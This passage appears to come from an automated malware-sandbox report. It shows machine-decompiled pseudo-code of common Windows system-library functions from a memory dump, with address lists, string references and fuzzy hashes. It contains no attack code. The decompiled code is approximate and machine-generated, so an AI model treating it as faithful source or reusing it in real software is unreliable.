							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                                      0x0165e620
                                                      0x0165e628
                                                      0x0165e62f
                                                      0x0165e631
                                                      0x0165e635
                                                      0x0165e637
                                                      0x0165e63e
                                                      0x016b5503
                                                      0x016b5503
                                                      0x0165e64c
                                                      0x0165e64c
                                                      0x0165e651
                                                      0x00000000
                                                      0x00000000
                                                      0x0165e661
                                                      0x0165e665
                                                      0x016b542a
                                                      0x0165e715
                                                      0x0165e71a
                                                      0x0165e71c
                                                      0x0165e720
                                                      0x0165e720
                                                      0x0165e727
                                                      0x0165e736
                                                      0x0165e736
                                                      0x0165e743
                                                      0x0165e743
                                                      0x0165e673
                                                      0x0165e678
                                                      0x0165e67d
                                                      0x0165e682
                                                      0x0165e685
                                                      0x0165e692
                                                      0x0165e69b
                                                      0x0165e6a3
                                                      0x0165e6ad
                                                      0x0165e6b1
                                                      0x0165e6b2
                                                      0x0165e6bb
                                                      0x0165e6bf
                                                      0x0165e6c0
                                                      0x0165e6c8
                                                      0x0165e6cc
                                                      0x0165e6d5
                                                      0x0165e6d9
                                                      0x00000000
                                                      0x00000000
                                                      0x0165e6e5
                                                      0x0165e6ea
                                                      0x0165e6f9
                                                      0x0165e70b
                                                      0x0165e70f
                                                      0x016b5439
                                                      0x016b545e
                                                      0x016b545e
                                                      0x00000000
                                                      0x016b545e
                                                      0x016b543b
                                                      0x016b543e
                                                      0x016b5440
                                                      0x016b5445
                                                      0x016b5472
                                                      0x016b5475
                                                      0x016b548d
                                                      0x016b5493
                                                      0x016b54a9
                                                      0x00000000
                                                      0x00000000
                                                      0x016b54ab
                                                      0x016b54b4
                                                      0x016b54bc
                                                      0x016b54c8
                                                      0x016b54de
                                                      0x016b54fb
                                                      0x016b54e0
                                                      0x016b54e6
                                                      0x016b54eb
                                                      0x016b54eb
                                                      0x016b54de
                                                      0x00000000
                                                      0x016b54bc
                                                      0x016b5477
                                                      0x016b547a
                                                      0x016b5480
                                                      0x016b5483
                                                      0x016b5486
                                                      0x016b548b
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x016b548b
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x016b5447
                                                      0x016b5447
                                                      0x016b5447
                                                      0x016b5447
                                                      0x016b544e
                                                      0x00000000
                                                      0x00000000
                                                      0x016b5450
                                                      0x016b5452
                                                      0x016b5455
                                                      0x016b545a
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x016b545c
                                                      0x016b546a
                                                      0x016b546d
                                                      0x016b546f
                                                      0x00000000
                                                      0x016b546f
                                                      0x0165e70f

                                                      Strings
                                                      • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0165E68C
                                                      • @, xrefs: 0165E6C0
                                                      • InstallLanguageFallback, xrefs: 0165E6DB
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                      • API String ID: 0-1757540487
                                                      • Opcode ID: 217b8028c4d3a5728690b093a5e1ad0799bc0a3a02c23ac4d4422607f6428f33
                                                      • Instruction ID: 002f9c31dd03f7544aa44a2e8c954bab3bbc5281d482fc7014d20002a71f9b44
                                                      • Opcode Fuzzy Hash: 217b8028c4d3a5728690b093a5e1ad0799bc0a3a02c23ac4d4422607f6428f33
                                                      • Instruction Fuzzy Hash: D951BF725053069BDB14DF68CC90ABBB7E9AF88714F04092EF986D7240EB34DA44C7A6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0171E539, Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 60%
                                                      			E0171E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E0171BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E0171BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E0171AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E01699730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E0171A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E0171A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E01699730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E0171A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E0171A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E01672280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E0166B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E0166FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E01677D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E0170FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                                                      0x0171e547
                                                      0x0171e549
                                                      0x0171e54f
                                                      0x0171e553
                                                      0x0171e557
                                                      0x0171e55a
                                                      0x0171e55c
                                                      0x0171e55f
                                                      0x0171e561
                                                      0x0171e567
                                                      0x0171e56b
                                                      0x0171e7e2
                                                      0x00000000
                                                      0x0171e571
                                                      0x0171e575
                                                      0x0171e577
                                                      0x0171e57b
                                                      0x0171e57c
                                                      0x0171e57d
                                                      0x0171e57e
                                                      0x0171e57f
                                                      0x0171e588
                                                      0x0171e58f
                                                      0x0171e591
                                                      0x0171e592
                                                      0x0171e592
                                                      0x0171e596
                                                      0x0171e59e
                                                      0x0171e5a0
                                                      0x0171e5a6
                                                      0x0171e61d
                                                      0x0171e61d
                                                      0x0171e621
                                                      0x0171e623
                                                      0x0171e630
                                                      0x0171e630
                                                      0x0171e7e6
                                                      0x0171e7eb
                                                      0x0171e7ed
                                                      0x0171e7f4
                                                      0x0171e7fa
                                                      0x0171e7ff
                                                      0x0171e7ff
                                                      0x0171e80a
                                                      0x0171e812
                                                      0x0171e812
                                                      0x0171e5ab
                                                      0x0171e5b4
                                                      0x0171e5b9
                                                      0x0171e5be
                                                      0x0171e5c0
                                                      0x0171e5c2
                                                      0x0171e5c8
                                                      0x0171e5c9
                                                      0x0171e5cb
                                                      0x0171e5cc
                                                      0x0171e5d5
                                                      0x0171e5e4
                                                      0x0171e5f1
                                                      0x0171e5f8
                                                      0x0171e5f8
                                                      0x0171e5d5
                                                      0x0171e602
                                                      0x0171e616
                                                      0x0171e63d
                                                      0x0171e644
                                                      0x0171e64d
                                                      0x0171e652
                                                      0x0171e657
                                                      0x0171e659
                                                      0x0171e65b
                                                      0x0171e661
                                                      0x0171e662
                                                      0x0171e664
                                                      0x0171e665
                                                      0x0171e66e
                                                      0x0171e67d
                                                      0x0171e68a
                                                      0x0171e691
                                                      0x0171e691
                                                      0x0171e66e
                                                      0x0171e6b0
                                                      0x00000000
                                                      0x0171e6b6
                                                      0x0171e6bd
                                                      0x0171e6c7
                                                      0x0171e6d7
                                                      0x0171e6d9
                                                      0x0171e6db
                                                      0x0171e6de
                                                      0x0171e6e3
                                                      0x0171e6f3
                                                      0x0171e6fc
                                                      0x0171e700
                                                      0x0171e700
                                                      0x0171e704
                                                      0x0171e70a
                                                      0x0171e70a
                                                      0x0171e713
                                                      0x0171e716
                                                      0x0171e719
                                                      0x0171e720
                                                      0x0171e761
                                                      0x0171e76b
                                                      0x0171e774
                                                      0x0171e77a
                                                      0x0171e77a
                                                      0x0171e78a
                                                      0x0171e791
                                                      0x0171e799
                                                      0x0171e79b
                                                      0x0171e79f
                                                      0x0171e7aa
                                                      0x0171e7c0
                                                      0x0171e7ac
                                                      0x0171e7b2
                                                      0x0171e7b9
                                                      0x0171e7b9
                                                      0x0171e7c7
                                                      0x0171e806
                                                      0x00000000
                                                      0x0171e7c9
                                                      0x0171e7d1
                                                      0x0171e7d8
                                                      0x00000000
                                                      0x0171e7d8
                                                      0x00000000
                                                      0x00000000
                                                      0x0171e722
                                                      0x0171e72e
                                                      0x0171e748
                                                      0x0171e74c
                                                      0x0171e754
                                                      0x0171e756
                                                      0x0171e75c
                                                      0x0171e75c
                                                      0x00000000
                                                      0x0171e75c
                                                      0x0171e758
                                                      0x0171e758
                                                      0x00000000
                                                      0x0171e758
                                                      0x0171e750
                                                      0x00000000
                                                      0x00000000
                                                      0x0171e752
                                                      0x00000000
                                                      0x0171e752
                                                      0x0171e730
                                                      0x0171e735
                                                      0x0171e73d
                                                      0x0171e73f
                                                      0x00000000
                                                      0x00000000
                                                      0x0171e741
                                                      0x0171e741
                                                      0x00000000
                                                      0x0171e741
                                                      0x0171e739
                                                      0x00000000
                                                      0x00000000
                                                      0x0171e73b
                                                      0x00000000
                                                      0x0171e73b
                                                      0x0171e722
                                                      0x0171e720
                                                      0x0171e6b0
                                                      0x0171e618
                                                      0x00000000
                                                      0x0171e618

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: `$`
                                                      • API String ID: 0-197956300
                                                      • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                      • Instruction ID: b25a2247e434d0c542b41ed6fb758542c29336ead75833f4361223979d0c79e9
                                                      • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                      • Instruction Fuzzy Hash: 58917F316043429FE726CE2DC945B1BFBE6AF84714F14892DFA95CB288EB74E904CB51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 016D51BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 77%
                                                      			E016D51BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x17305f0);
				E016AD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E0166EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E016D53CA(0);
						return E016AD130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0169F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E01673690(1, _t117, 0x1631810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0169AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L01674620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0169AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E016D500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E01699860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                                      0x016d51be
                                                      0x016d51c3
                                                      0x016d51c8
                                                      0x016d51cd
                                                      0x016d51d0
                                                      0x016d51d3
                                                      0x016d51d8
                                                      0x016d51db
                                                      0x016d51de
                                                      0x016d51e0
                                                      0x016d51e3
                                                      0x016d51e6
                                                      0x016d51e8
                                                      0x016d5342
                                                      0x016d5351
                                                      0x016d5356
                                                      0x016d535a
                                                      0x016d5360
                                                      0x016d5363
                                                      0x016d5366
                                                      0x016d5369
                                                      0x016d5369
                                                      0x016d536b
                                                      0x016d536b
                                                      0x016d5370
                                                      0x016d53a3
                                                      0x016d53a4
                                                      0x016d53a6
                                                      0x016d53ab
                                                      0x016d53ab
                                                      0x016d53ae
                                                      0x016d53ae
                                                      0x016d53b5
                                                      0x016d53bf
                                                      0x016d53bf
                                                      0x016d5375
                                                      0x016d5396
                                                      0x016d53a0
                                                      0x016d53a0
                                                      0x00000000
                                                      0x016d5396
                                                      0x016d5377
                                                      0x016d5379
                                                      0x016d537f
                                                      0x016d538c
                                                      0x016d5390
                                                      0x00000000
                                                      0x016d5390
                                                      0x016d51ee
                                                      0x016d51f1
                                                      0x016d5301
                                                      0x016d5310
                                                      0x016d5315
                                                      0x016d5318
                                                      0x016d531b
                                                      0x016d5320
                                                      0x016d532e
                                                      0x016d5331
                                                      0x00000000
                                                      0x016d5331
                                                      0x016d5328
                                                      0x016d5329
                                                      0x00000000
                                                      0x016d5329
                                                      0x016d51fa
                                                      0x016d5235
                                                      0x016d5236
                                                      0x016d5239
                                                      0x016d523f
                                                      0x016d5240
                                                      0x016d5241
                                                      0x016d5242
                                                      0x016d5246
                                                      0x016d5247
                                                      0x016d524e
                                                      0x016d5251
                                                      0x016d5267
                                                      0x016d5269
                                                      0x016d526e
                                                      0x016d527d
                                                      0x016d527e
                                                      0x016d5281
                                                      0x016d5282
                                                      0x016d5287
                                                      0x016d5288
                                                      0x016d528a
                                                      0x016d528f
                                                      0x016d5294
                                                      0x00000000
                                                      0x00000000
                                                      0x016d529a
                                                      0x016d529c
                                                      0x016d529e
                                                      0x016d529e
                                                      0x016d52a4
                                                      0x016d52b0
                                                      0x00000000
                                                      0x00000000
                                                      0x016d52ba
                                                      0x016d52bc
                                                      0x016d52bc
                                                      0x016d52d4
                                                      0x016d52d9
                                                      0x016d52dc
                                                      0x016d52e1
                                                      0x00000000
                                                      0x00000000
                                                      0x016d52e7
                                                      0x016d52f4
                                                      0x00000000
                                                      0x016d52f4
                                                      0x016d5270
                                                      0x00000000
                                                      0x016d5270
                                                      0x016d51fc
                                                      0x016d51fd
                                                      0x016d5202
                                                      0x016d5203
                                                      0x016d5205
                                                      0x016d520a
                                                      0x016d520f
                                                      0x00000000
                                                      0x00000000
                                                      0x016d521b
                                                      0x016d5226
                                                      0x016d522b
                                                      0x016d521d
                                                      0x016d521d
                                                      0x016d5222
                                                      0x016d5222
                                                      0x016d522d
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: Legacy$UEFI
                                                      • API String ID: 2994545307-634100481
                                                      • Opcode ID: 5f7d833754436f92bc76304bebbd2365022812cdc5cc5a4e93d744d13039d42e
                                                      • Instruction ID: 25d15b7d282350ea1de464291efaa6f09dae6136f419f5f3c681d982b5ac3a42
                                                      • Opcode Fuzzy Hash: 5f7d833754436f92bc76304bebbd2365022812cdc5cc5a4e93d744d13039d42e
                                                      • Instruction Fuzzy Hash: 0D517C71E006099FDB24DFA8CD40AAEBBF9FB48700F15402DE60AEB651EB71D901CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0165B171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 78%
                                                      			E0165B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x172f7a8);
				E016AD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E016AD130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0169D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0169F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L016ADEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0169B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0169B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0169E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0169A890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                      0x0165b171
                                                      0x0165b171
                                                      0x0165b171
                                                      0x0165b171
                                                      0x0165b171
                                                      0x0165b176
                                                      0x0165b17b
                                                      0x0165b180
                                                      0x0165b186
                                                      0x0165b18f
                                                      0x0165b198
                                                      0x0165b1a4
                                                      0x0165b1aa
                                                      0x016b4802
                                                      0x016b4802
